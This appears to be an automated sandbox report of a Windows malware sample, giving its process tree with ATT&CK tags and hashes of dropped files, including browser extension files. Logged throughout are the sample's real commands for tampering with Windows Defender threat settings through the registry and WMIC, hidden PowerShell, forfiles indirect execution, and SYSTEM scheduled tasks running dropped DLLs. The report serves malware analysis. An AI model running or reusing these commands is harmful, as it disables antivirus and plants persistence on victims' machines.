                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:636
                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                                              PID:3568
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:2560
                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:2952
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                PID:3772
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:3228
                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:3472
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                                                                  PID:1664
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:3448
                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:3792
                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:1924
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:1380
                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:3936
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                          PID:3008
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:3780
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                PID:1504
                                                                                                                                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:2116
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:3640
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:2072
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                                                              PID:1332
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:2508
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  PID:2520
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:3820
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                                                              PID:2824
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:3412
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    PID:3420
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:3668
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\pumiVP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                PID:3352
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\qnslGBI.xml" /RU "SYSTEM"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                PID:3784
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /END /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:872
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:3364
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\JGxMqqn.xml" /RU "SYSTEM"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                  PID:1984
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\XHqTkBD.xml" /RU "SYSTEM"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                  PID:3940
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\xGDTShL.xml" /RU "SYSTEM"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                  PID:3276
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\vLqbFvV.xml" /RU "SYSTEM"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                  PID:3864
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "kjGlTxIfJQSbObiUU" /SC once /ST 10:45:01 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\kQKuITtm\YRNngum.dll\",#1 /GtrCdidD 385121" /V1 /F
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                  PID:2508
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /run /I /tn "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:2196
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "eUngO1" /SC once /ST 17:44:13 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:3204
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /run /I /tn "eUngO1"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:1300
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /DELETE /F /TN "eUngO1"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:592
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /DELETE /F /TN "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2984
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1580
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:1740
                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\kQKuITtm\YRNngum.dll",#1 /GtrCdidD 385121
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:3564
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\kQKuITtm\YRNngum.dll",#1 /GtrCdidD 385121
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                          PID:2436
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /DELETE /F /TN "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                            PID:2020
                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-1958486945-5479054422051741862-1039720904-786629254921151486-17868981213863830"
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:1556
                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2380
                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-142664016-292358368-1121127947940218309531280887-103672990921206187281996503581"
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:964
                                                                                                                                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:2776
                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "-1951572840618905957-199792545120716007701113510269-7122253571017773047-2121112730"
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:2720
                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-1140909506558371800-1086577969-8378624791880466553-1495071650-1895532769-442022405"
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:2628
                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-675377858-1028594405-20746181947299768671240821306-76701401311245851631002975856"
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:392
                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "7213915239004158966128972771529766582-18029561251158260161858528062-779053199"
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:1160
                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "1616908839174054639241968150748345551-940894958-1819826129-21301135381185421649"
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:3636
                                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:948
                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "2078347569-203380302620856789222127930909170020690203065585121133365901833868508"
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:2328
                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "168605217117989659371505088197-10904188422318729121861433696780617466141086039"
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:3152
                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "2022040453-643508065-17239054391675039555-1284084140-646697545-506972222-280538347"
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:1600
                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-19389074631956498039-577867922119486243713239165481922187-1720217090-164065020"
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:960
                                                                                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:1632
                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-1687465266-615356508-1698926386-278933509-713981490-9880370816354125852074322865"
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:2944
                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "818710919-919692365-1246235958-1827586211-1908701018-901918894-21375530311034692058"
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:980
                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-26141316-1865076766-592413761815858941-201033520685697731-9080030941994095270"
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:4084

                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          2.1MB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          92f19545b0e443ecbbe3d3fd84458fac

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          690ff23a54778a0cedc60d417a0fbb60f67e4380

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          d06f566738d01af6c418dfd01839623bbd0ac43b37281c91ac9e1118be772feb

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          f9b0db17d5cd30df7d21587af642f30a580b6557290991049668ea7aa17e0c90570dfd3bf1836bc42f4fa6a15871684009a63eb4a4d613e8577b595ae1eff55c

                                                                                                                                                                                                                                                        • C:\ProgramData\HCGCAAKJDHJJJJJKKKFB

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          6KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          cce2abde5f94c294f6a5cc5cdac5af1b

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          61aa3fbf7c03c46574466fa545d8259d671b8de1

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          9eb5b4365ca6b772d33f48181a226d19d31f1f3b535305d7b916cc5a94c1fc69

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          01331ce551796071880f2575e826146c853ff83a4c71647906347dc86995c2a9cdbb6e91b9fa41e1e5fb0a04f8666b663e4e198618327a264446493a2fa8c173

                                                                                                                                                                                                                                                        • C:\ProgramData\HDGCAAFB

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          92KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          e248975fcae2fff4649630d9421bd44e

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          283f382e83b0767a0cd6b2d54bce3c1c315c60d6

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          2e7470ccd25b6d7e9606f29643dbda3e3a4ef3f0575b2d074986c80cf8b148d2

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          9bd5cf49a7773811d72be905cc8dfc2310f82899553c6f598a52b5dc261fc26191462855fdba8b3a83c8a317faed71a1a134df83f338c6c9442ee792cdf7428f

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          342B

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          09ea8f1b2837af28af57ce0cd0a7932a

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          6925ac97421052c10ea9080919f337c362277078

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          e2e4f848d29bf2db4215f04790746fbef7a90fa51c2205258fc92ef6916bb3ba

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          9a2ca36783ffc721e97fce652a881faab5158506a096a1736cbced0cb53db4eae1be312c7278b289a1661b1cb131041aae1d60e29d7b21b495c8e8e9cacf81b1

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          187B

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          136B

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          150B

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          9KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          fd8a826d9f51cb5d2d9a93678fa66d18

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          74e26b266895844355a40d6abb172e9ecc0a346d

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          a559a200c22ebe58f05da8491a93af4364c87b2692e6a64efdd3a7a2e57936b1

                                                                                                                                                                                                                                                          SHA512

